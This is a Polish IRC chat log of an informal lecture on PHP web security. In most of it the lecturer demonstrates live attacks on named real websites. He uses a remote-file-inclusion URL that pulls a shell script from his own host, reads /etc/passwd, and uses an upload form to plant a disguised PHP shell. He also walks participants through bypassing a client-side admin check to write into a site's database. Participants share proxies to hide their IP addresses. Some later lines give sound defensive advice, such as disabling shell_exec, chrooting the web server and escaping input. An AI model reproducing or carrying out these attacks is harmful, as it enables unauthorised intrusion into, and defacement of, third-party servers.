19:49 <@Evill> ok
19:49 <@Evill> witam wsyzstkich zebranych
19:50 <@Evill> dzisiaj zajmiemy sie security
19:50 <@Evill> dotyczace php
19:50 <@Evill> to moj 1 wyklad wiec prosze o poblazliwosc
19:50 <@Evill> jestem evill : spy hanibal fubu
19:50 <@Evill> spotkac mnie mozna na haxite t-nas
19:50 <@Evill> mam mroczna przeszlosc
19:50 <@Evill> ludzie mnie nielubia
19:50 <@Evill> wiec zacznijmy
19:50 <@Annihilator> od razu numer buta i stan cywilny, bo mnie interesuje
19:51 <@Annihilator> ;-]
19:51 <@Evill> ;]
19:51 <@Evill> kazdy szanujacy sie admin
19:51 <@Evill> na serwerze instaluje
19:51 <@Evill> cpanel
19:51 <@Evill> oczywiscie dziurawy jak licho ale nie nato czas
19:51 <@Evill> kady cpanel udostepnia funkcje
19:51 <@Evill> shell_exec
19:52 <@Evill> jest to funkcja shella w php
19:52 <@Evill> poprzez zapytania mozemy poslugiwac sie jak zwyklym shellem
19:52 <@Evill> no teraz zwykly czlowiek spyta co z tego
19:52 <@Evill> a no to ze fajnie miec shella na serwerze
19:52 <@Evill> http://evill.hacker.la/include.txt
19:52 <@Evill> jest to potezny skrypt
19:53 <@Evill> napisany przez znaomego "radmena"
19:53 <@Evill> niekazdy zas wie jak mozna go wykorzystac
19:53 <@Evill> wiec niebede dalej owijal w piedoly i zacznijmy :)
19:53 <@Evill> google.pl potezne nazedzie agresora :)
19:53 <@Evill> kazdy pewnie czytal
19:54 <@Evill> o zapytaniach google
19:54 <@Evill> ale jak to wykorzystac
19:54 <@Evill> pomocnym zapytaniem jest przykladowy "inurl:"
19:54 <@Evill> te zapytanie sprawdza w adresie strony czy istnieje ow slowo
19:54 <@Evill> hmm :)
19:54 <@Evill> to jazda
19:55 <@Evill> google.pl >> inurl:index.php inurl:.html
19:55 <@Evill> te zatypanie kaze google szukac plikow index.php oraz includowanego .html
19:55 <@Evill> jest to bug w include
19:55 <@Evill> niepozorny programista przy tworzeniu strony
19:56 <@Evill> jelsi da zapytanie include ("$zmienna"):
19:56 <@Evill> robi kategoryczny blad
19:56 <@Evill> poniewasz agresor
19:56 <@Evill> wystarczy ze sie odwola
19:56 <@Evill> index.php?zmienna=http://o2.pl
19:56 <@Evill> i widzi strone http://o2.pl
19:56 <@Evill> teraz pewnie zapytacie co z tego
19:57 <@Evill> a to ze mozemy wlasny skrypt zaincludowac na serwer
19:57 <@Evill> podam przyklad; ]
19:57 <@Evill> http://www.criativaformaturas.com.br/htm/index.php?pagina=http://evill.hacker.la/include.txt
19:57 <@Evill> strona brazylijska
19:57 <@Evill> poniewaz do google dozucilem zapytanie site:br i szukal tylko na tonach brazylijskich
19:58 <@Evill> widzicie prosty skrypcik radmena
19:58 <@Evill> zapodajecie pytania shell i naciskaci "shell" :ds
19:58 <@Evill> sory ze tak diwnie pisze ale denerwoje sie :)
19:58 <@Evill> wzucice cat /etc/passwd
19:58 <@Evill> i nacsnijcie na "shell"
19:59 <@Evill> widzicie konta uzytkownikow :)
19:59 <@Evill> uname -a
19:59 <@Evill> Linux trevor.roteador.info 2.4.22-1.2199.nptl #1 Wed Aug 4 12:21:48 EDT 2004 i686 i686 i386 GNU/Linux
19:59 <@Evill> niebede pogasywal wam jak zdobyc roota
19:59 <@Evill> chociaz przy tej funkcji
19:59 <@Evill> niepotrzebny jest root
20:00 <@Evill> poniewaz mamy dostep do wszystkich kont ( mozemy podgladac pliki) szukac hasle itd itp
20:00 <@Evill> wlasnie odezwal sie ktos
20:00 <@Evill> kazal mi zwolnic :)
20:01 <@Evill> ok wiec sciagne -m i odpowiem na pytania
20:01 <@Evill> slucham :)
20:01 < r00uter> now iec o co chodzi ?
20:01 < r00uter> znalazles ta strone brazylijska i co
20:01 < Astarot> Fubu jakie bledy oprucz include i injectiona omowisz ;>?
20:01 < adam_i> Imho nie powniens pokazywac tego na przykaldze jakiejs tam stronki
20:01 < r00uter> [20:05] zapodajecie pytania shell i naciskaci "shell" :ds
20:01 < fgfd> jak podmieniÄ‡ www
20:01 < Heretic> i to ze mozna sie wlamac na caly serwer dzieki temu
20:01 < r00uter> od tego nie kapuje
20:02 <@Evill> ok
20:02 < illusion> fubu: zapomiales wspomniec ze ten skrypt ktory pokazales to moja przerobka skryptu radmena ;]
20:02 <@Evill> weszlem na strone
20:02 < Sorror> jak sie wlamac na gg? ;-)
20:02 <@Evill> tak ok :)
20:02 < kamil> wszedlem*
20:02 < dreston> heheheh
20:02 < kamil> :>
20:02 <@Evill> \setmode #wyklady +m
20:02 <@Evill> ok
20:02 <@Evill> wiec zwolnie
20:02 <@Evill> zacznijmy jeszcze raz
20:02 <@Evill> weszlem na strone http://www.criativaformaturas.com.br/htm/index.php?
20:03 <@Evill> http://www.criativaformaturas.com.br/htm/index.php?pagina=index
20:03 <@Evill> zamiast podpietego index podepnijcie sobie nop http://onet.pl
20:03 <@Evill> i co wdzicie ? na stronie paginy
20:03 <@Evill> wyskakuje onet :)
20:03 <@Evill> wiec zamiast onetu includujemy skrypt radmena
20:04 <@Evill> ktory mozna znalesc na http://evill.hacker.la/include.txt
20:04 <@Evill> wiec link wyjsciowy
20:04 <@Evill> co nieidzie ?
20:04 <@Evill> slucham cie
20:04 < nie_idzie> podniemiam index na onet i nie ma onetu
20:04 < nie_idzie> tylko error
20:04 <@Evill> nie na onet
20:04 <@Evill> tylko na
20:04 < Lexus> lol
20:04 < pudzian> :D
20:04 <@Evill> http://onet.pl
20:04 < Astarot> Evill co jeszcze oprucz include opiszesz?
20:05 < Sorror> dalej sie na gg nie moge wlamac...
20:05 < nie_idzie> http://www.criativaformaturas.com.br/htm/http://onet.pl?pagina=index
20:05 < kamil> umieram ze smiechu :)
20:05 < dreston> lamerstwo;)
20:05 <@Evill> ok wsadzicie ze lamerstwo :)
20:05 <@Evill> http://www.criativaformaturas.com.br/htm/index.php?pagina=http://onet.pl
20:05 <@Evill> tak ma wykldac podpiecie
20:06 <@Evill> a tak wyglada podpiecie skryptu radmena
20:06 <@Evill> http://www.criativaformaturas.com.br/htm/index.php?pagina=http://onet.pl
20:06 <@Evill> http://www.criativaformaturas.com.br/htm/index.php?pagina=http://evill.hacker.la/include.txt
20:06 <@Evill> jak juz napisalem zodbycie roota na tym serwerze niema zabardoz sensu
20:06 <@Evill> poniewasz
20:07 <@Evill> 1. mam shella z poziomu php
20:07 <@Evill> 2. mamy dostep do wszystkich plikow na wsyzstkich kontach
20:07 <@Evill> wiec poco mieszac :) ale nawet zdobycie roota jest latwiejsze
20:07 <@Evill> wszystko rozumiecie ?
20:07 <@Evill> slucham ?
20:07 < Heretic> a ja mam takie pytanko, czy rada na to byloby sprawdzanie zmiennch $_GET ??
20:07 <@mulander> co jezeli apache jest chrootowany ?
20:08 < expert_wsrod_plebsu> ;-]
20:08 <@mulander> i masz dostep tylko do falszywego drzewa katalogow
20:08 < pudzian> albo gdyby mial suphp jak u mnie?:P
20:08 <@mulander> a uprawnienia nie pozwalaja na wykonywanie waznych polecen ?
20:08 <@Evill> heretick tak
20:08 <@Evill> mozemy rowniesz napisavc na zwyklym case
20:08 < Heretic> no tak
20:08 < expert_wsrod_plebsu> Evill, druta pó¼niej, dawaj lepiej /etc/shadow
20:08 < expert_wsrod_plebsu> ;-]
20:08 < adam_i> Wez lepij wogule nie wlonczj tego +m bo tu dozu do poprawnia jest
20:09 <@mulander> Evill: co jezeli apache jest chrootowany praktycznie bez uprawnien do ingerencji w system ?
20:09 <@Evill> wtedy lipa :)
20:09 <@Evill> sposob nato
20:09 <@Evill> wylaczyc funkcje shell_exec
20:09 <@Evill> nadac prawa
20:10 <@Evill> a najlepiej chroot na pache jak juz ktos wspomnia³
20:10 <@Evill> hmm :)
20:10 <@Evill> wpisaliscie juz
20:10 <@Evill> cat /etc/passwd
20:10 <@Evill> widzici konta
20:10 <@Evill> wiec
20:11 <@Annihilator> Sluchajcie
20:11 <@Annihilator> Kolega dobrze mowi, tylko troche po haxorsku
20:11 <@Evill> ls /home/nawakonta/public_html/ i widzicie
20:11 <@Evill> pliki danego uzytkownika :)
20:11 <@Annihilator> Pokazuje co mozna zrobic, jak kto¶ ma kupowato skonfigurowane PHP
20:11 <@Evill> sory stras :p
20:11 <@Annihilator> Evill, zatem, jak siê zabezpieczyæ przed czym¶ takim?
20:11 <@Evill> wylaczyc funckje shell_exec :)
20:12 <@Evill> lub zalozyc chroota na apache
20:12 <@Evill> ow blad
20:12 <@Evill> znalazlem na najwiekszym serwisie hostingowym
20:12 <@Evill> webd.pl
20:12 <@Annihilator> Ja osobi¶cie na pocz±tek polecam: register_globals=OFF
20:12 <@Evill> adam a prawa co to jest ? to safe mode :)
20:13 <@Evill> mialem przez takia glupote dostep do do najwiekszych serwisow w polsce :)
20:13 <@Evill> hmm wiec co dalej wam opsiac :)
20:13 <@Evill> moze zajmiemy sie uplodadem :)
20:13 <@Annihilator> Nie chodzi o to, ze haker, tylko zwraca uwage na czêste b³êdy
20:14 <@Evill> wiec zapytanie google brmi :)
20:14 <@Evill> intitle: upload
20:14 <@Evill> by w title strony wyszukiwal slow upload
20:14 <@Evill> z uploadem jest jeden blad
20:15 <@Evill> mozliwosc wzucania do niego czegokolwiek
20:15 <@Evill> a zwlaszcza skryptu radmena ;]
20:15 <@Evill> wec siedze na google i lukam na ow upload :)
20:15 <@Evill> i znalazlem ;]
20:15 <@Evill> http://www.automobilklub.radom.pl/zdjecia/
20:16 <@Evill> jest plik upload.html
20:16 <@Evill> odpalacie go i wzucacie co wam sie zywnie pooba ja wzucilem skrypt radmena :)
20:16 <@Evill> http://www.automobilklub.radom.pl/zdjecia/2047287525-include.jpg.php
20:17 <@Evill> ;]
20:17 <@Evill> sa i znowu ponad kilkadziesiat k¹t nalezy dowas :)
20:17 <@Evill> hmm mzoe odpowiem na pytania :)
20:17 <@Annihilator> kont
20:17 <@Annihilator> ;-]
20:17 <@Evill> \mode #wyklady -m
20:17 <@Evill> ;)
20:17 <@Evill> ma ktos jakies ?
20:17 < r00uter> jakos wolno wysyla
20:18 < kamil> swietny kabaret, lepszy niz ani mru mru :)
20:18 < faxe> "kÄ…t" LOL
20:18 < Sorror> po ile frytki
20:18 <@Evill> kamil dlaczego ?
20:18 < faxe> i Halama
20:18 <@phoenix__> mozecie gdzies logi dac?
20:18 <@Evill> no dobra moze niejestem najlepszym wykladowca
20:18 <@phoenix__> wyslac na ph003n1x@gmail.com
20:18 <@Evill> to moj 1 raz wiec prosze o cierpliwosc
20:18 <@Annihilator> S³uchajcie
20:18 <@Annihilator> To ja wspomogê evilla
20:18 <@Evill> thx :)
20:19 <@phoenix__> Evill: nie przejmuj sie, sa ludzie i parapety ;P
20:22 <@Annihilator> Podstawowa zasada - dane wprowadzane z adresu i z formularzy, czyli z Internetu, nalezy traktowac jak niebezpieczne
20:22 <@Evill> piekne polecam :P :)
20:22 <@Annihilator> Cokolwiek uzytkownik wpisze w waszym formularzu
20:22 <@Evill> siedza tam programisci najlepsi z of miasta a i tak serwer jest niezabezpieczony
20:22 <@Annihilator> Nawet ,,Kocham Cie''
20:22 <@Annihilator> Wy macie to uznac, za probe zabojstwa Waszego serwisu
20:22 <@Annihilator> Nawet jak macie formularz dla Waszej dziewczyny
20:22 <@Annihilator> W ktorym ona sobie pisze kiedy ma okres
20:22 <@Evill> koljny blad jaki chce pokazac jest to autoryzacja :)
20:23 <@Annihilator> To jej wpisy tez maja byc sprawdzane czy serwerowi krzywdy nie zrobia
20:23 <@Annihilator> Kontynuuj Evill
20:23 <@Evill> tzw . moi programisci z miasta postanowili zrobic autoryzacje na panel admina :)
20:23 <@Annihilator> Astarot, dokoncze
20:23 <@Evill> asterot mam zkonczyc ?
20:23 <+Astarot> nie
20:24 <+Astarot> napisz o formularzacg
20:24 <@Evill> wiec z kad ten nick ?
20:24 <@Annihilator> Kto?
20:24 <@Annihilator> Ja?
20:24 <@Annihilator> Czy on?
20:24 <+Astarot> jakie dane sa niebezpieczne
20:24 <@Annihilator> ok
20:24 <+Astarot> zapytania do bazy
20:24 <@phoenix__> dobra leccie pokolei
20:24 <@Annihilator> ups
20:24 < kamil> Annihilator: przesadziles z okresem, to bylo nie smaczne.
20:24 <+Astarot> i sosob obrony
20:24 < kamil> :)
20:24 <@phoenix__> Anni co ty robisz ;P
20:24 <@Annihilator> phoenix__, glupie irssi
20:24 <@Annihilator> ;-]
20:24 <@Evill> ;]
20:24 <@Annihilator> Ok
20:24 <@Annihilator> Wrocmy do tematu formularzy
20:24 <@Annihilator> Skoro jeden z plebsu chce
20:25 <@Annihilator> Przepraszam za wyrazenie ale to przenosnia
20:25 <@Annihilator> ;-]
20:25 <@Annihilator> Wiec tak
20:25 <@Annihilator> Dane, w formularzu musza byc sprawdzane
20:25 <@Annihilator> Przykladowo, macie formularz, w ktory nalezy wpisac PESEL
20:25 <@Annihilator> A wszyscy wiemy, ze PESEL to numer
20:25 <@Annihilator> To oczywiste jest, ze nie powinnismy pozwolic wpisywac tam liter czy znakow
20:26 <@Annihilator> Od tego jest funkcja preg_match() i wyrazenia regularne, ale musialbym na szybko przyklad wymyslac a nie umiem
20:26 <@Annihilator> Po prostu - w polu na PESEL
20:26 <@Annihilator> Ma byc PESEL
20:26 <@Annihilator> A nie imie psa
20:26 <@Evill> :)
20:26 <@Annihilator> Bo imie psa moze wylozyc baze
20:26 <@Annihilator> Jak bedzie mialo dziwne znaki
20:26 <@Evill> a ja moze cos jeszcze tez o formularz dozuce :)
20:26 <@Evill> ale to zachwile kontynuluj :)
20:27 <@Annihilator> Sa rozne fun kcje do tego
20:27 <@Annihilator> Karql, proponuje str_len
20:27 <@Annihilator> Czyli dlugosc
20:27 <@Annihilator> Prawidlowo
20:27 <@Annihilator> Bo PESEL
20:27 <@Annihilator> Ma 11 cyfr
20:27 <@Annihilator> Data urodzenia + numer
20:27 <@Annihilator> Wiec jak ktos wpisze 15
20:27 < Gynvael> (i sume kontrolna w sobie tak btw)
20:27 <@Annihilator> To nie bedzie to pesel
20:27 <@Annihilator> Chyba ze on z obozu zaglady wrocil i sie upiera
20:28 <@Annihilator> toZbrodnia, to dostanie w leb
20:28 <@Annihilator> ;-)
20:28 <@Annihilator> Po prostu zakladamy, ze pesel ma miec 11 cyfr
20:28 <@Evill> ok dozuce cos :)
20:28 <@Annihilator> I tylko jedenascie znakow mozna wpisac w formularz
20:28 <@Annihilator> Reszta to blad
20:28 <@Evill> pojade dalej z jasnetem :)
20:28 <@Annihilator> Evill, proszê
20:28 <@Evill> dokladnie w tym przykladize bedzie pokazany blad z formularzem
20:28 <@Evill> dziekuje :)
20:29 <@Evill> a wiec programiscie z mojego miasta postanowili
20:29 <@Evill> zrobic autoryzacj w js
20:29 <@Evill> wszystko bylo by w porzadku
20:29 <@Evill> gdyby nniepopelnili 1 bledu
20:29 <@Evill> ow autoryzacja sprawdz
20:30 <@Evill> czyy uzytkownik sie zalogowal dopiero po
20:30 <@Evill> wyswietleniu panela admina
20:30 <@Evill> sa to ulamki sekund
20:30 <@Evill> ale potencjalny napastnik moze to wykorzystac
20:30 <@Evill> wystrczy ze w czasie ladowania
20:30 <@Evill> cisniecie w przegladarce stop
20:30 <@Evill> "STOP"
20:31 <@Evill> i podejzycie zrudlo
20:31 <@Evill> zrudlo troszke bedzie sie ladowac ale sie eniwykona
20:31 <@Evill> kopiujmy zrudlo :)
20:31 <@Evill> zapisujemy go w plik.html na komputerze
20:31 <@Evill> tzw odpalamy lokalnie :)
20:32 <@Evill> ps sory za bldy jestem dysklektykiem :)
20:32 <@Annihilator> Lekko sie wtrace: Heretic mi zglosil apropo tego PESELu, ze mozna w HTMLu w ustawieniach formularza miec maxlenght na 11 znakow, tez dobry pomysl i uzupelnienie
20:32 <@Annihilator> Evill, dawaj dalej
20:32 <@Evill> :D ;]
20:32 <@Evill> luz :)
20:32 <@Evill> odplalamy nasz plik.html
20:32 <@Evill> na kompie i widzimy panel admina :)
20:32 <@Evill> co z tego ?
20:32 <@Annihilator> faxe, napisalem, ze dobre uzupelnienie, nie skowycz tam
20:32 <@Annihilator> ;-]
20:33 <@Evill> potencjalny napastnik moze pozmieniac linki w formularzu
20:33 <@Evill> i wprowadzic
20:33 <@Evill> dane odrazu do bazy :)
20:33 <@Evill> poniewasz programisci
20:34 <@Evill> nuiedali sprawdzania formlarzu przed wlsniem do bazy
20:34 <@Evill> rozwiazanie samo sie nasuwa :)
20:34 <@Evill> kazdy formularz przed wyslaniem musi byc sprawdzany
20:34 <+faxe> thx
20:34 <@Annihilator> Jestescie najbardziej aktywni to czasem mowcie, bo mnie glowa boli jak te nicki zmieniacie
20:34 <@Annihilator> Ale nie za czesto
20:34 <+faxe> chyba: po odebraniu
20:34 <@Annihilator> ;-)
20:34 <@Evill> ;)
20:34 <@Annihilator> Przed i po najlepiej
20:34 <@Annihilator> :p
20:34 <@Annihilator> JavaScriptem tez mozna sprawdzac, zgadza sie
20:34 <@Evill> faxe ast : chcecie cos dodac ?
20:34 <+faxe> przed wyslaniem=na kliencie = wszystko mozna sfalszowac
20:35 <@Annihilator> Ale jak konradvme mowi, mozna ja wylaczyc
20:35 <@Annihilator> Wiec trzeba zadbac na serwerze o to
20:35 <@Evill> i znow mamy konfigurace serwera :)
20:35 <+Astarot> dajcie jakis przyklad spreparowania formularza moze.. :D
20:35 <@Evill> pokazac moze na jasnet.pl ;)
20:35 <+Astarot> i cos o zlych zapytaniach sql ;P
20:35 <@Annihilator> Evill, masz takowy przyklad?
20:35 <@Evill> szczeze niewiem czy zalatali ow blad :)
20:35 <@Evill> ale watpie :)]
20:36 <@Annihilator> Jak masz to pokaz
20:36 <@Evill> niepokaze powiem , niech sami zrobia :)
20:36 <@Annihilator> Polacy musza zobaczyc, by uwierzyc
20:36 <@Evill> ale to bedzie trooche nielegalne :)
20:36 <@Evill> co otym sadzisz ? :)
20:36 <@Annihilator> O czym?
20:36 <@Annihilator> Ty wykladasz
20:36 <@Evill> moge pokazywac takie zeczy tu ?
20:37 <@Annihilator> Jak cos to Ciebie wsadza do paki a nam zamkna szkole
20:37 <@Annihilator> ;-]
20:37 <@Evill> :)
20:37 <@Evill> ok
20:37 <@Annihilator> Po prostu pokazuj i juz
20:37 <@Evill> wiecpakujcie sie na jasnet.pl
20:37 <@Annihilator> Nie pytaj sie
20:37 <@Evill> powiem ze brzydka strona :)
20:37 <@Evill> niepodoba mi sie
20:37 <@Evill> kilka osob zadalo pytanie
20:37 <@Evill> gdze jest panel administracyjny :)
20:38 <@Evill> niepowiem ze latwo go znalesc :)
20:38 <@Evill> firefox ma fajna wtyczke
20:38 <@Evill> httliveheander
20:38 <@Evill> jakos podobnie :)
20:38 <+faxe> Http Live Headers
20:38 <+faxe> pisane razem
20:38 <@Evill> ;)
20:38 <@Evill> thx
20:38 <@Evill> ta wtyczka pokazuje
20:39 <@Evill> jakie sa linki na stornie
20:39 <@Evill> z kad co jest wklejone :) oraz naglowki
20:39 <+glos> a nie latwiej
20:39 <+glos> zrodlo i znalesc
20:39 <@Evill> ?
20:39 <+glos> ?
20:39 <@Evill> w takiejs tornie masz zrudlo bardzo
20:39 <+faxe> bleh, LiveHTTPHeaders
20:39 <@Evill> duze
20:39 <@Evill> wiec niema sensu szkac jednego linku
20:39 <+r00uter> ale
20:39 <+r00uter> czekaj
20:39 <@Annihilator> r00uter, po co, jak masz od tego wtyczkê?
20:39 <@Evill> w bardzo duzym rudle :)
20:40 <+r00uter> edycja ---> szukaj na stronie
20:40 <@Evill> jestes w bledzie
20:40 <@Evill> pozatym czego suzkasz ?
20:40 <+faxe> Annihilator: firefox bez zadnych wtyczek listuje linki na stronie ...
20:40 <+faxe> Ctrl+I pacnij se
20:40 <@Evill> ;)
20:40 <@Evill> wiec znalzliscie panel admina ? :)
20:40 <+faxe> albo iterowalny obiekt JavaScript document.links;
20:40 <@Annihilator> faxe, a faktycznie
20:41 <@Evill> ok wiec jesli znalezliscie moge kontynowac
20:41 <@Evill> jsli nie dobrze posuzkacjcie poniewasz ja
20:41 <@Evill> wa m niepowiem gdzie on jest
20:41 <@Evill> to jest typu gra "hackme" sami musicie dizalac :)
20:42 <@Evill> powiem wam dalej :)
20:42 <@Evill> jak juz znalezlisice panel
20:42 <@Evill> jest to 3 literowy folder
20:42 <@Evill> dopiszcie do niego powiecmy dzial "prawo"
20:42 <@Annihilator> Ja mam tylko drobna uwage
20:42 <+Astarot> http://www.google.pl/search?hl=pl&q=inurl%3Ajasnet.pl+panel&lr=
20:42 <@Evill> jest to panel administracyjy dzialu "prawo" znajdujacy sie na stronie
20:42 <@Annihilator> Jak chcecie to haxowac
20:43 <@Evill> :)
20:43 <+Astarot> po co sie meczyc google cie wyreczy ;P
20:43 <@Annihilator> TO wezcie sie laczcie przez jakies proxy
20:43 <@Annihilator> Aby Waszego IP nie mieli na serwerze
20:43 <@Annihilator> Od tak na wszelki wypadek
20:43 <+Astarot> a jak ktos ma zmienne ?
20:43 <@Evill> tak oczywiscie tez mozna juz zanzaczylem na poczatku ze google to poztezne nazedzie
20:43 <+Astarot> ;>
20:43 <@Annihilator> Astarot, to tez
20:43 <@Annihilator> Przykladowe proxy: w3cache.icm.edu.pl:8080
20:43 <@Evill> jak juz wejdziecie :)
20:44 <@Evill> to juz powiedizalem "stop"
20:44 <@Evill> zrudlo
20:44 <@Evill> kopiujeice go na locala
20:44 <@Annihilator> Sorror, no to daj inne
20:44 <@Evill> usuwacie wpis o sprawdzaniu kto jest zalogowany
20:44 <@Annihilator> Daj inne proxy
20:44 <@Annihilator> Bo ja nie znam zagranicznych zabardzo
20:44 <+Sorror> 148.244.150.58
20:44 <@Evill> ;)
20:44 <@Evill> podaj port :p
20:45 <+Sorror> 80 lolu ;-)
20:45 <@Evill> nijestem lolkiem
20:45 <@Annihilator> --- 148.244.150.58 ping statistics ---
20:45 <@Annihilator> 12 packets transmitted, 11 received, 8% packet loss, time 11009ms
20:45 <@Annihilator> rtt min/avg/max/mdev = 209.084/221.256/230.923/6.712 ms
20:45 <@Annihilator> Ale mam routing
20:45 <@Annihilator> ;p
20:45 <+Sorror> to bylo pieszczotliwe... kontynuuj fÃ³bÃ³ ;-)
20:45 <@Evill> wiiec pojade dalej :)
20:45 <@Evill> sorroor : nie nazywaj mnie tak mowisz jak bysmy sie znali
20:46 <@Evill> zkopiowalisice zrudlo ?
20:46 <@Evill> usuneliscie wpis ?
20:46 <@Evill> wiec odpalcie
20:46 <@Evill> widzicie panel admina :)
20:46 <@Evill> szkoda ze loklnie ale zawsze cos
20:46 <@Evill> dajecie "dodaj wpis "
20:47 <@Annihilator> jestesmy_z_policji, ja jestem ministrem MSWiA wiêc siedzieæ tam cicho
20:47 <@Annihilator> ;-]
20:47 <@Evill> oczywiscie nic wam niewyjdzie bo niedopisalicie linka www.jasnet.pl do urla dodaj wpis :)
20:47 <@Evill> po dopisaniu
20:47 <@Evill> powinna wam sie zaladowac storna z formularzem dodania wpisu
20:47 <@Evill> znow dajecie stop i robicie tak jak poprzednio
20:48 <@Evill> po zkopiowaniu zrudla
20:48 <@Evill> dodajecie link doflormularza "jasnet.pl"
20:48 <@Evill> wpisujecie co wam sie zywnie podoba :)
20:48 <@Evill> i wysylacie
20:49 <@Evill> dane z formularza niesa sprawdzane i odrazu dodawane do bazy wiec mozecie pisac co wams ie podoba
20:49 <@Evill> a skutki ogladac na www.jasnet.pl/prawo/ ;)
20:49 <@Evill> wysluham teraz pytan :)
20:50 < Heretic> ile lat za hakerstwo ^_^ ?
20:50 <+r00uter> wiec tak
20:50 < jestesmy_z_policji> dowodziki prosze
20:50 < fgfd> dajcie newsa hacked
20:50 <+r00uter> 1. jak jestem w tym folderze to dopisuje PRAWO
20:50 < fgfd> :P
20:50 < Naur[afk]> 2-5lat chyba
20:50 <+r00uter> i jak sie laczy z logowaniem na to prawoi to stop
20:50 <+r00uter> ?
20:50 <+faxe> ja tutaj tylko gram, nie zabierajcie mnie, proszee!
20:50 < redeye> prawo to beidze w sadzie;]
20:50 < redeye> teraz dowodziki
20:50 <+faxe> mam rodzine na utrzymaniu
20:50 <+Sorror> ;-D
20:50 < kamil> ziew :)
20:50 < Heretic> a³ ... 5 lat ... to ja wole proxy od 5 lat ^_^
20:50 < Naur[afk]> chyba ze jakies wieksze szkody fizyczne
20:50 <@Evill> wiec niema zadnych pytan ?
20:50 <+r00uter> sa
20:51 <+r00uter> tylko przeszkadzali
20:51 <@phoenix__> Evill: czemu nie widac skutkow ?
20:51 <@Annihilator> Miejcie lito¶æ dla tej strony
20:51 <+r00uter> 1. jak jestem w tym folderze to dopisuje PRAWO i jak sie laczy z logowaniem na to prawoi to stop
20:51 <@Annihilator> Nie narobcie tam burdelu
20:51 <@Evill> a dodales do bazy ?
20:51 < redeye> jakeij strony?
20:51 < Klocek{}> kacik dla pan
20:51 < Klocek{}> :>
20:51 < redeye> mozna adres?
20:51 < redeye> bo dopuiero wszedlem
20:51 <+Astarot> to mial byc wyklad o php nie js ! chyba ?
20:51 <+Astarot> ce klocek ;P
20:51 <+Astarot> cze*
20:51 < Klocek{}> otworzyl mi sie
20:51 < Klocek{}> :P
20:51 <+r00uter> evil
20:51 <@Evill> wiec dalej gadacie :d
20:52 <@Evill> jak w klasie dla kujonow :p
20:52 <+r00uter> odpowiesz mi ?
20:52 <@Evill> slucham cie
20:52 <+r00uter> 1. jak jestem w tym folderze to dopisuje PRAWO i jak sie laczy z logowaniem na to prawoi to stop
20:52 <@Evill> podaj link do panelu a ci odpowiem
20:52 <@phoenix__> szybko i zaraz -v all i siedziec cicho i nickow nie zmieniac
20:52 <+r00uter> http://www.jasnet.pl/xyz/
20:52 <@Evill> http://www.jasnet.pl/xyz/prawo/
20:52 <+r00uter> tak
20:52 <@Evill> w czasie ladowania dajesz stop
20:53 <+r00uter> i ciagne zrdlo
20:53 <@Evill> niebede wam mowil jak to zhakowac :) pokazalem jak sami sie meczcie :)
20:53 <@Evill> tak
20:53 <+r00uter> ok
20:53 <+r00uter> wszystko
20:53 <@Evill> wiiec to chyba koniec mojego dramatycznego wykladu
20:53 <@Evill> ktory nie wypalil
20:53 <@phoenix__> Vee zaraz
20:53 <@Evill> wszselkie pytania
20:54 <@Evill> prsze zadawac na prv a odpowiem
20:54 <@Evill> dziekuj
20:54 <@Evill> e
20:54 < faxe> jak poprawnie przyjmowac dane z formularzy do bazy - wlasnie
20:54 < Heretic> no testowac je
20:54 < Vengeance> normalnie ;]
20:54 < Astarot> ehh.. nawet pozadnie tematu nie zaczelismy...
20:54 <@phoenix__> Annihilator: zrob cos o formularzach plz
20:54 < Heretic> stripslashes ?
20:54 < Vengeance> o czym chcecie
20:55 < Vengeance> uslyszec ;]
20:55 < Sorror> a kiedy o cpp ;-)
20:55 < Astarot> Venge sypnij cos o ochronie skryptow ;>
20:55 <@phoenix__> albo tyy Vee
20:55 < Heretic> no gadajcie dalej bo sie ciekawie zrobilo :P
20:55 <@Annihilator> Ja nie jestem gotowy na taki wyk³ad
20:55 <@Annihilator> Mogê zrobiæ jutro dopiero
20:55 <@phoenix__> Veee masz opa i mow
20:55 < konradvme> Vengeance o ASMie
20:55 < Vengeance> nie znam ;P
20:55 < Heretic> asm :| ? wtf ?
20:55 <@Annihilator> http://www.maciaszek.pl/phpcon/download/bezpieczenstwo.pdf
20:55 <@Annihilator> Jak ktos chce o formularzach
20:55 < Vengeance> phoenix__: nie chce opa ;] moge opowiadac ot tak...
20:55 <@Annihilator> Tu jest wszystko
20:55 < Vengeance> a nie ze wyklad :D
20:55 < Vengeance> co do formularzy....
20:55 <@Vengeance> to nie wazcie sie uzywac
20:55 <@Vengeance> addslashes()
20:55 <@Evill> tez poslucham :)
20:55 < Karql> ide zainstalowac gmail notifier do mirandy
20:56 <@Vengeance> i stripslashes() :D
20:56 < Heretic> czemu ?
20:56 <@Vengeance> zly nawyk (ktory sam przez dlugi czas mialem)
20:56 <@Annihilator> Vengeance to czarna owca
20:56 <@Annihilator> ;-]
20:56 <@Vengeance> do celu zabezpiezcen
20:56 < adam_i> Imho to poiwino byc tak ze omowine jakes podstawowe bledy powidzne jak sie zabezpiczyc a nie glupie pokazywanie haxiorowania jakis przypadkowych stron I lamanie prawa
20:56 <@Vengeance> sluzy specjalnie np. dla MySQL
20:56 <@Vengeance> funkcja
20:56 <@Vengeance> mysql_escape_string
20:56 <@phoenix__> Vengeance: tyo mow od razu do czego stripslashes i addslashes
20:56 < Heretic> usuwa i dodaje "/"
20:56 <@Evill> adam_i : moj 1 raz . nastepnym razem poprawie sie mam nadzieje)
20:57 <@Vengeance> addslashes dodaje znak ucieczki
20:57 <@Vengeance> przed niebezpieczne znaki
20:57 < konradvme> Heretic \
20:57 <@Annihilator> adam_i, zgadza siê
20:57 <@Vengeance> jak np ' " czy /
20:57 <@Vengeance> stripslashes odwraca dzialanie addslashes
20:57 <@Vengeance> jednak ich nei sotsujemy :D
20:57 <@Vengeance> o wilee lepsze jest
20:57 <@Vengeance> mysql_escape_string
20:57 <@Vengeance> czym sie rozni?
20:57 <@Vengeance> ano przy przekazywaniu danych do bazy
20:57 <@Vengeance> filtrujemy zmienna przez mysql_escape_string
20:57 < Heretic> ale jak to sie stosuje dokladnie? jako sprawdzanie mysql_query ?
20:57 <@Vengeance> a przy wyciaganiu danych...
20:57 <@Vengeance> nie trzeba zadnych stripslashes()
20:57 <@phoenix__> cicho Vee mowi
20:58 <@Vengeance> po prostu sie je pobiera :]
20:58 <@Evill> ;)
20:58 <@Vengeance> zaraz dam przyklad jakis
20:58 <@Annihilator> Dzisiaj sa referaty
20:58 <@Annihilator> Nie wyklady
20:58 <@Annihilator> ;-]
20:58 <@Vengeance> 20:58 <@Vengeance> $item = "Zak's Laptop";
